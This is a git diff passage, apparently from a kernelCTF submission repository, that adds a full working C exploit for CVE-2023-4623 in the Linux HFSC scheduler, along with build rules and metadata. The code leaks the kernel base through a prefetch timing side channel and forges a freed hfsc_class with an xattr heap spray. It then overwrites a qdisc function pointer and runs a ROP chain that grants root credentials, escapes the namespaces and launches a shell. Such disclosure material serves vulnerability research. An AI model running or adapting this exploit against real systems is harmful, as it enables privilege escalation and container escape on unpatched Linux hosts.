-Wno-format -static + +exploit: exploit.c + +run: + ./exploit diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/lts-6.1.36/exploit b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/lts-6.1.36/exploit new file mode 100644 index 00000000..85dd53d4 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/lts-6.1.36/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/lts-6.1.36/exploit.c 
b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/lts-6.1.36/exploit.c
new file mode 100644
index 00000000..7f4456c5
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/lts-6.1.36/exploit.c
@@ -0,0 +1,481 @@
+#define _GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <net/if.h>
+#include <net/if_arp.h>
+#include <linux/netlink.h>
+#include <linux/rtnetlink.h>
+#include <linux/pkt_sched.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/xattr.h>
+
+/* Prefetch kaslr leak */
+#define MIN_STEXT 0xffffffff81000000
+#define MAX_STEXT 0xffffffffbb000000
+#define BASE_INC 0x1000000
+#define SYS_GETUID 0x1a7440
+
+/* simple_xattr spray */
+#define XATTR_SPRAY 32
+#define XATTR_HEADER_SIZE 32
+#define XATTR_SLAB_LEN 1024
+#define XATTR_DATA_LEN (XATTR_SLAB_LEN/2)
+
+/* hfsc_class offsets */
+#define LEVEL_OFFSET 100
+#define CL_PARENT_OFFSET 112
+#define VT_NODE_OFFSET 192
+#define CF_NODE_OFFSET 224
+#define CL_VT_OFFSET 280
+#define CL_CVTMIN_OFFSET 312
+
+/* Data offsets */
+#define INIT_NSPROXY 0x26765c0
+#define QFQ_CHANGE_QDISC_LOC 0x295d438
+
+/* Function offsets */
+#define PREPARE_KERNEL_CRED 0x1befb0
+#define COMMIT_CREDS 0x1bed10
+#define FIND_TASK_BY_VPID 0x1b5600
+#define SWITCH_TASK_NAMESPACES 0x1bd180
+
+/* Gadget offsets */
+#define PUSH_RSI_JMP_QWORD_PTR_RSI_MINUS_0x70 0xdf26ac
+#define PUSH_RDI_POP_RBX_POP_RBP_RET_THUNK 0x09e7eb
+#define POP_RSP_POP_RBX_RET_THUNK 0x357c79
+#define POP_RDI_RET_THUNK 0x088893
+#define POP_RSI_RET_THUNK 0x0d88a3
+#define POP_RDX_RET_THUNK 0x047e72
+#define POP_RCX_RET_THUNK 0x0271ec
+#define MOV_RDI_RAX_THUNK_RCX 0x817ea9
+#define ADD_RAX_RCX_RET_THUNK 0x0d5f84
+#define PUSH_RAX_JMP_RDX_THUNK 0x94dca7
+#define POP_RSP_RET_THUNK 0x068961
+#define MOV_RAX_R14_POP_R14_RET_THUNK 0xa210ac
+#define POP_R14_RET_THUNK 0x0d88a2
+
+#define err_exit(s) do { perror(s); exit(EXIT_FAILURE); } while(0)
+
+struct tf_msg {
+    struct nlmsghdr nh;
+    struct tcmsg tm;
+#define TC_DATA_LEN 512
+    char attrbuf[TC_DATA_LEN];
+};
+
+struct if_msg {
+    struct nlmsghdr nh;
+    struct ifinfomsg ifi;
+};
+
+/* Netlink message for setting loopback up. */
+struct if_msg if_up_msg = {
+    {
+        .nlmsg_len = 32,
+        .nlmsg_type = RTM_NEWLINK,
+        .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK,
+    },
+    {
+        .ifi_family = AF_UNSPEC,
+        .ifi_type = ARPHRD_NETROM,
+        .ifi_index = 1,
+        .ifi_flags = IFF_UP,
+        .ifi_change = 1,
+    },
+};
+
+int xattr_fd;
+char rop_buf[512];
+char jop_buf[0x70];
+
+void pin_cpu (int cpu) {
+    cpu_set_t set;
+    CPU_ZERO(&set);
+    CPU_SET(cpu, &set);
+    if (sched_setaffinity(0, sizeof(set), &set))
+        err_exit("[-] sched_setaffinity");
+}
+
+/*
+ * Prefetch timing code from Daniel Gruss.
+ * https://github.com/IAIK/prefetch
+ */
+
+inline __attribute__((always_inline)) size_t rdtsc_begin () {
+    size_t a, d;
+    asm volatile (
+        "mfence\n\t"
+        "RDTSCP\n\t"
+        "mov %%rdx, %0\n\t"
+        "mov %%rax, %1\n\t"
+        "xor %%rax, %%rax\n\t"
+        "mfence\n\t"
+        : "=r" (d), "=r" (a)
+        :
+        : "%rax", "%rbx", "%rcx", "%rdx");
+    a = (d<<32) | a;
+    return a;
+}
+
+inline __attribute__((always_inline)) size_t rdtsc_end () {
+    size_t a, d;
+    asm volatile(
+        "xor %%rax, %%rax\n\t"
+        "mfence\n\t"
+        "RDTSCP\n\t"
+        "mov %%rdx, %0\n\t"
+        "mov %%rax, %1\n\t"
+        "mfence\n\t"
+        : "=r" (d), "=r" (a)
+        :
+        : "%rax", "%rbx", "%rcx", "%rdx");
+    a = (d<<32) | a;
+    return a;
+}
+
+void prefetch (void* p) {
+    asm volatile ("prefetchnta (%0)" : : "r" (p));
+    asm volatile ("prefetcht2 (%0)" : : "r" (p));
+}
+
+size_t onlyreload (void* addr) {
+    size_t time = rdtsc_begin();
+    prefetch(addr);
+    size_t delta = rdtsc_end() - time;
+    return delta;
+}
+
+/*
+ * Simple implementation of the prefetch side channel to
+ * bypass KASLR.
+ */
+
+long kaslr_leak (int tries1, int tries2) {
+    long base = -1, addr;
+    size_t time;
+    size_t min = -1;
+
+    /* Calibrate the minimum latency against an unmapped address. */
+    addr = 0xffffffff80000000;
+    for (int i = 0; i < tries1; i++) {
+        time = onlyreload((void *)addr);
+        min = min < time ? min : time;
+    }
+
+    /* The lowest candidate base whose sys_getuid prefetches faster
+     * than the baseline is taken as the kernel base. */
+    for (int i = 0; i < tries2; i++) {
+        for (addr = MIN_STEXT; addr <= MAX_STEXT; addr += BASE_INC) {
+            time = onlyreload((void *)(addr + SYS_GETUID));
+            if (time < min && addr < base) {
+                base = addr;
+            }
+        }
+    }
+    return base;
+}
+
+void init_rop (long *rop, long *jop, long kbase) {
+    *jop++ = kbase + POP_RSP_POP_RBX_RET_THUNK;
+    /* restore rbx */
+    *rop++ = kbase + PUSH_RDI_POP_RBX_POP_RBP_RET_THUNK;
+    *rop++ = 0;
+    /* commit_creds(prepare_kernel_cred(0)) */
+    *rop++ = kbase + POP_RDI_RET_THUNK;
+    *rop++ = 0;
+    *rop++ = kbase + PREPARE_KERNEL_CRED;
+    *rop++ = kbase + POP_RCX_RET_THUNK;
+    *rop++ = kbase + COMMIT_CREDS;
+    *rop++ = kbase + MOV_RDI_RAX_THUNK_RCX;
+    /* switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy) */
+    *rop++ = kbase + POP_RDI_RET_THUNK;
+    *rop++ = 1;
+    *rop++ = kbase + FIND_TASK_BY_VPID;
+    *rop++ = kbase + POP_RSI_RET_THUNK;
+    *rop++ = kbase + INIT_NSPROXY;
+    *rop++ = kbase + POP_RCX_RET_THUNK;
+    *rop++ = kbase + SWITCH_TASK_NAMESPACES;
+    *rop++ = kbase + MOV_RDI_RAX_THUNK_RCX;
+    /* return back to the original stack */
+    *rop++ = kbase + MOV_RAX_R14_POP_R14_RET_THUNK;
+    *rop++ = 0;
+    *rop++ = kbase + POP_RDX_RET_THUNK;
+    *rop++ = kbase + POP_R14_RET_THUNK;
+    *rop++ = kbase + PUSH_RAX_JMP_RDX_THUNK;
+    *rop++ = kbase + POP_RCX_RET_THUNK;
+    *rop++ = (long)-384;
+    *rop++ = kbase + ADD_RAX_RCX_RET_THUNK;
+    *rop++ = kbase + POP_RDX_RET_THUNK;
+    *rop++ = kbase + POP_RSP_RET_THUNK;
+    *rop++ = kbase + PUSH_RAX_JMP_RDX_THUNK;
+}
+
+/* Helper functions for creating rtnetlink messages. */
+
+unsigned short add_rtattr (struct rtattr *rta, unsigned short type, unsigned short len, char *data) {
+    rta->rta_type = type;
+    rta->rta_len = RTA_LENGTH(len);
+    memcpy(RTA_DATA(rta), data, len);
+    return rta->rta_len;
+}
+
+int vuln_class_id = 0x00010001; // 1:1, classid of the vulnerable RSC parent.
+int def_class_id = 0x00010002;  // 1:2, classid where packets are enqueued.
+struct tf_msg newqd_msg, delc_msg, new_rsc_msg, new_fsc_msg, new_qfq_qdisc;
+
+void init_tf_msg (struct tf_msg *m) {
+    m->nh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
+    m->tm.tcm_family = PF_UNSPEC;
+    m->tm.tcm_ifindex = if_nametoindex("lo");
+    m->nh.nlmsg_len = NLMSG_LENGTH(sizeof(m->tm));
+}
+
+void init_qdisc_msg (struct tf_msg *m) {
+    init_tf_msg(m);
+    m->nh.nlmsg_type = RTM_NEWQDISC;
+    m->tm.tcm_parent = -1;
+    m->tm.tcm_handle = 1 << 16;
+    m->nh.nlmsg_flags |= NLM_F_CREATE;
+    m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((struct rtattr *)((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len)), TCA_KIND, strlen("hfsc") + 1, "hfsc"));
+    struct rtattr *opts = (struct rtattr *)((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len));
+    short def = 2;
+    m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr(opts, TCA_OPTIONS, 2, (char *)&def));
+}
+
+void init_rsc_class_msg (struct tf_msg *m) {
+    init_tf_msg(m);
+    m->nh.nlmsg_type = RTM_NEWTCLASS;
+    m->tm.tcm_parent = 1 << 16;
+    m->tm.tcm_handle = vuln_class_id;
+    m->nh.nlmsg_flags |= NLM_F_CREATE;
+    m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((struct rtattr *)((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len)), TCA_KIND, strlen("hfsc") + 1, "hfsc"));
+    struct rtattr *opts = (struct rtattr *)((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len));
+    opts->rta_type = TCA_OPTIONS;
+    opts->rta_len = RTA_LENGTH(0);
+    int rsc[3] = {1, 1, 1};
+    opts->rta_len += RTA_ALIGN(add_rtattr((struct rtattr *)((char *)opts + opts->rta_len), TCA_HFSC_RSC, sizeof(rsc), (char *)rsc));
+    m->nh.nlmsg_len += NLMSG_ALIGN(opts->rta_len);
+}
+
+void init_fsc_class_msg (struct tf_msg *m) {
+    init_tf_msg(m);
+    m->nh.nlmsg_type = RTM_NEWTCLASS;
+    m->tm.tcm_parent = vuln_class_id;
+    m->tm.tcm_handle = def_class_id;
+    m->nh.nlmsg_flags |= NLM_F_CREATE;
+    m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((struct rtattr *)((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len)), TCA_KIND, strlen("hfsc") + 1, "hfsc"));
+    struct rtattr *opts = (struct rtattr *)((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len));
+    opts->rta_type = TCA_OPTIONS;
+    opts->rta_len = RTA_LENGTH(0);
+    int fsc[3] = {1, 1, 1};
+    opts->rta_len += RTA_ALIGN(add_rtattr((struct rtattr *)((char *)opts + opts->rta_len), TCA_HFSC_FSC, sizeof(fsc), (char *)fsc));
+    m->nh.nlmsg_len += NLMSG_ALIGN(opts->rta_len);
+}
+
+void init_del_class_msg (struct tf_msg *m) {
+    init_tf_msg(m);
+    m->nh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
+    m->nh.nlmsg_type = RTM_DELTCLASS;
+    m->tm.tcm_handle = vuln_class_id;
+}
+
+void init_qfq_qdisc_msg (struct tf_msg *m) {
+    init_tf_msg(m);
+    m->nh.nlmsg_type = RTM_NEWQDISC;
+    m->tm.tcm_parent = 0x00010002;
+    m->tm.tcm_handle = 2 << 16;
+    m->nh.nlmsg_flags |= NLM_F_CREATE;
+    m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((struct rtattr *)((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len)), TCA_KIND, strlen("qfq") + 1, "qfq"));
+    m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((struct rtattr *)((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len)), TCA_OPTIONS, sizeof(jop_buf), jop_buf));
+    m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((struct rtattr *)((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len)), TCA_OPTIONS, sizeof(rop_buf), rop_buf));
+}
+
+void init_nl_msgs (void) {
+    init_qdisc_msg(&newqd_msg);
+    init_del_class_msg(&delc_msg);
+    init_rsc_class_msg(&new_rsc_msg);
+    init_fsc_class_msg(&new_fsc_msg);
+}
+
+/*
+ * Send a Netlink message and check for error.
+ */
+void netlink_write (int sock, struct tf_msg *m) {
+    struct {
+        struct nlmsghdr nh;
+        struct nlmsgerr ne;
+    } ack;
+    if (write(sock, m, m->nh.nlmsg_len) == -1)
+        err_exit("[-] write");
+    if (read(sock, &ack, sizeof(ack)) == -1)
+        err_exit("[-] read");
+    if (ack.ne.error) {
+        errno = -ack.ne.error;
+        perror("[-] netlink");
+    }
+}
+
+void netlink_write_noerr (int sock, struct tf_msg *m) {
+    if (write(sock, m, m->nh.nlmsg_len) == -1)
+        err_exit("[-] write");
+}
+
+/*
+ * Allocate simple_xattr objects.
+ */
+int num_xattr = 0;
+char xattr_buf[XATTR_DATA_LEN];
+void spray_simple_xattrs(int num_spray) {
+    char name[32];
+    for (int i = 0; i < num_spray; i++, num_xattr++) {
+        sprintf(name, "security.%d", num_xattr);
+        if (fsetxattr(xattr_fd, name, xattr_buf, XATTR_DATA_LEN, 0) == -1)
+            err_exit("[-] fsetxattr");
+    }
+}
+
+/*
+ * Send a message on the loopback device. Used to trigger qdisc enqueue and
+ * dequeue functions.
+ */
+void loopback_send (void) {
+    /* family AF_INET, address 0.0.0.0:0, which routes via loopback */
+    struct sockaddr iaddr = { AF_INET };
+    int inet_sock_fd = socket(PF_INET, SOCK_DGRAM, 0);
+    if (inet_sock_fd == -1)
+        err_exit("[-] inet socket");
+    if (connect(inet_sock_fd, &iaddr, sizeof(iaddr)) == -1)
+        err_exit("[-] connect");
+    if (write(inet_sock_fd, "", 1) == -1)
+        err_exit("[-] inet write");
+    close(inet_sock_fd);
+}
+
+int main (int argc, char **argv) {
+    long kernel_base;
+
+    pin_cpu(0);
+
+    /* Get kernel base from command line or prefetch side channel */
+    if (argc > 1) {
+        kernel_base = strtoul(argv[1], NULL, 16);
+        printf("[*] Using provided kernel base: 0x%lx\n", kernel_base);
+    } else {
+        printf("[*] Using prefetch to leak kernel base...\n");
+        /* Warm up the getuid syscall path before probing it. */
+        getuid();
+        kernel_base = kaslr_leak(1000, 1000);
+        if (kernel_base == -1) {
+            printf("[*] Prefetch failed\n");
+            exit(EXIT_FAILURE);
+        }
+        printf("[*] Leaked kernel base: 0x%lx\n", kernel_base);
+    }
+
+    if (unshare(CLONE_NEWUSER) == -1)
+        err_exit("[-] unshare(CLONE_NEWUSER)");
+    if (unshare(CLONE_NEWNET) == -1)
+        err_exit("[-] unshare(CLONE_NEWNET)");
+
+    /* Open temporary file to use for xattr spray */
+    xattr_fd = open("/tmp/", O_TMPFILE | O_RDWR, 0664);
+    if (xattr_fd == -1)
+        err_exit("[-] open");
+
+    /* Open socket to send netlink commands to */
+    int nl_sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
+    if (nl_sock_fd == -1)
+        err_exit("[-] nl socket");
+
+    /* Set loopback device up; if_msg shares its leading nlmsghdr with tf_msg */
+    if_up_msg.ifi.ifi_index = if_nametoindex("lo");
+    netlink_write(nl_sock_fd, (struct tf_msg *)&if_up_msg);
+
+    init_nl_msgs();
+
+    /* Trigger vuln */
+    netlink_write(nl_sock_fd, &newqd_msg);
+    netlink_write(nl_sock_fd, &new_rsc_msg);
+    netlink_write(nl_sock_fd, &new_fsc_msg);
+    loopback_send();
+    delc_msg.tm.tcm_handle = def_class_id;
+    netlink_write(nl_sock_fd, &delc_msg);
+
+    printf("[*] Triggered vulnerability\n");
+
+    /* Place fake hfsc_class in xattr */
+
+    /* hfsc_class.level = 1 (must be non-zero) */
+    xattr_buf[LEVEL_OFFSET - XATTR_HEADER_SIZE] = 1;
+    /* hfsc_class.vt_node = 1 (must be odd) */
+    xattr_buf[VT_NODE_OFFSET - XATTR_HEADER_SIZE] = 1;
+    /* hfsc_class.cf_node = 1 (must be odd) */
+    xattr_buf[CF_NODE_OFFSET - XATTR_HEADER_SIZE] = 1;
+    /* hfsc_class.cl_parent = &qfq_qdisc_ops.change (write target) */
+    long parent = kernel_base + QFQ_CHANGE_QDISC_LOC - CL_CVTMIN_OFFSET;
+    memcpy(xattr_buf + CL_PARENT_OFFSET - XATTR_HEADER_SIZE, &parent, 8);
+    /* hfsc_class.cl_vt = jop gadget (write value) */
+    long cl_vt = kernel_base + PUSH_RSI_JMP_QWORD_PTR_RSI_MINUS_0x70;
+    memcpy(xattr_buf + CL_VT_OFFSET - XATTR_HEADER_SIZE, &cl_vt, 8);
+
+    printf("[*] Spraying simple_xattrs...\n");
+    /* Spray simple_xattrs */
+    delc_msg.tm.tcm_handle = vuln_class_id;
+    netlink_write(nl_sock_fd, &delc_msg);
+    spray_simple_xattrs(XATTR_SPRAY);
+
+    /* Create new default class and trigger enqueue/dequeue to overwrite
+     * qfq_change_qdisc with jop gadget */
+    new_fsc_msg.tm.tcm_parent = 1 << 16;
+    netlink_write(nl_sock_fd, &new_fsc_msg);
+
+    printf("[*] Overwriting function pointer\n");
+    loopback_send();
+
+    /* Prepare ROP chain at an offset of 4 bytes. With the 4-byte rtattr
+     * header it will be at an 8-byte offset from rsi, allowing it to be
+     * reached with `push rsi ; pop rsp ; pop rbx` for the stack pivot */
+    init_rop((long *)(rop_buf + 4), (long *)jop_buf, kernel_base);
+
+    /* Create QFQ qdisc */
+    init_qfq_qdisc_msg(&new_qfq_qdisc);
+    netlink_write_noerr(nl_sock_fd, &new_qfq_qdisc);
+
+    /* Call overwritten function pointer */
+    printf("[*] Triggering ROP chain\n");
+    netlink_write_noerr(nl_sock_fd, &new_qfq_qdisc);
+
+    if (getuid()) {
+        printf("[-] Privesc failed\n");
+        exit(EXIT_FAILURE);
+    }
+
+    printf("[+] Returned from ROP\n");
+
+    int mntns_fd = open("/proc/1/ns/mnt", O_RDONLY);
+    if (mntns_fd == -1)
+        perror("[-] open(/proc/1/ns/mnt)");
+
+    int netns_fd = open("/proc/1/ns/net", O_RDONLY);
+    if (netns_fd == -1)
+        perror("[-] open(/proc/1/ns/net)");
+
+    int pidns_fd = open("/proc/1/ns/pid", O_RDONLY);
+    if (pidns_fd == -1)
+        perror("[-] open(/proc/1/ns/pid)");
+
+    if (setns(mntns_fd, CLONE_NEWNS) == -1)
+        perror("[-] setns mnt");
+    if (setns(netns_fd, CLONE_NEWNET) == -1)
+        perror("[-] setns net");
+    if (setns(pidns_fd, CLONE_NEWPID) == -1)
+        perror("[-] setns pid");
+
+    printf("[*] Launching shell\n");
+    system("/bin/sh");
+}
diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/metadata.json b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/metadata.json
new file mode 100644
index 00000000..b050b20a
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/metadata.json
@@ -0,0 +1,41 @@
+{
+  "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json",
+  "submission_ids": [
+    "exp93",
+    "exp98"
+  ],
+  "vulnerability": {
+    "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b3d26c5702c7d6c45456326e56d2ccf3f103e60f",
+    "cve": "CVE-2023-4623",
+    "affected_versions": [
+      "2.6.3 - 6.5.2"
+    ],
+    "requirements": {
+      "attack_surface": [
+        "userns"
+      ],
+      "capabilities": [
+        "CAP_NET_ADMIN"
+      ],
+      "kernel_config": [
+        "CONFIG_NET_SCH_HFSC"
+      ]
+    }
+  },
+  "exploits": {
+    "lts-6.1.36": {
+      "uses": [
+        "userns"
+      ],
+      "requires_separate_kaslr_leak": true,
+      "stability_notes": "succeeded on 10/10 tries against target instance (with kaslr leak update)"
+    },
+    "cos-97-16919.353.23": {
+      "uses": [
+        "userns"
+      ],
+      "requires_separate_kaslr_leak": true,
+      "stability_notes": "succeeded on 10/10 tries against target instance (with kaslr leak update)"
+    }
+  }
+}
\ No newline at end of file
diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/original_exp93.tar.gz b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/original_exp93.tar.gz
new file mode 100644
index 00000000..59770fcf
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/original_exp93.tar.gz differ
diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/original_exp98.tar.gz b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/original_exp98.tar.gz
new file mode 100644
index 00000000..f6171fca
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/original_exp98.tar.gz differ